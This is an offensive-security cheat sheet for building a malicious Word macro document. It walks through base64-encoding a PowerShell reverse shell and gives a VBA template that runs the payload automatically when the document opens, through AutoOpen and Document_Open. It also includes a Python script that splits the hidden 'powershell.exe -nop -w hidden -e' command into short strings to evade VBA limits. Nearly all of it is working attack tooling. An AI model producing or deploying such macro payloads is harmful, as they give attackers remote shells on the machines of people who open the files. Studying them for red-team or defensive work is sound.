# Client side

## Word macro

#### Create macro

1. view → macro → create macro → Macros in: Doc \[document]
2. `<ps reverse shell> | base64 | tr -d “\n”`
3. Split the generated string in several 50-length strings and concatenate them in the script to avoid VBA string size limit of 255 chars
4. Store the file as **.doc** or **.docm** NOT as **.docx**

#### VBA template

```
Sub AutoOpen()
<macro name>
End Sub
Sub Document_Open()
<macro name>
End Sub
Sub <macro name>()
Dim <var> As String
<splitted base64 string>
CreateObject("Wscript.Shell").Run <var>
End Sub
```

#### Python cut script

```
b64 = ""				# paste base64 string here
varname = "Str"	# set variable name
n = 50					#line length

opt = "powershell.exe -nop -w hidden -e"
str = opt+" "+b64
for i in range(0, len(str), n):
	if i==0:
		print(varname + ' = "' + str[i:i+n] + '"')
	else:
		print(varname + ' = "' + varname + ' + "' + str[i:i+n] + '"')
```